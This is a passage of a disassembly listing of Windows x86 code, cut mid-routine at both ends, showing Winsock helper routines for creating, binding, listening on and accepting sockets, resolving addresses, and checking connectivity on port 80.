push offset dword_41E294
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, dword_41E298
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call dword_41DE8C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp dword_41DE38, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_4053B1
pop ecx
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CFB: ; CODE XREF: sub_404CBB+19�j
; sub_404CBB+2C�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
leave
retn
sub_404CBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D10 proc near ; CODE XREF: sub_41349C+1B7�p
; sub_4143B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: sub_41349C+417�p
; sub_4143B0+109�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
